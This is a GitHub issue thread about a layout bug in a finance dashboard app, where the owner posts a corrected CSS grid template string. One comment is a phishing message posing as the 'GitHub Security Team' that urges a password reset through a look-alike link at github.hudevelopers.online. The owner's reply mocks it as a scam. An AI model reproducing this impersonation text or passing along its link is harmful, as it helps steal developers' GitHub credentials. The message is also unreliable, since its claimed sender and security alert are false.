### ISSUE TITLE
DashboardBox gridArea "i" PieCharts don't fit in a DashboardBox

### ISSUE THREAD

**Issue by CodeEventHorizon** [CodeEventHorizon/Finance-Dashboard-App#1]

**Comment by CodeEventHorizon** [comment]
the problem is:

`const gridTemplateLargeScreens = `
  "a b c"
  "a b c"
  "a b c"
  "a b f"
  "d e f"
  "d e f"
  "d h i"
  "g h j"
  "g h j"
  "g h j"
`;`

that should be:
`const gridTemplateLargeScreens = `
  "a b c"
  "a b c"
  "a b c"
  "a b f"
  "d e f"
  "d e f"
  "d h i"
  "g h i"
  "g h j"
  "g h j"
`;`

**Comment by mehdi-dev97** [comment]
# Urgent: Security Alert for CodeEventHorizon

Hello,

We've detected unusual activity in your GitHub. To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Comment by CodeEventHorizon** [comment]
@mehdi-dev97 well done, maybe some kid would fall for it
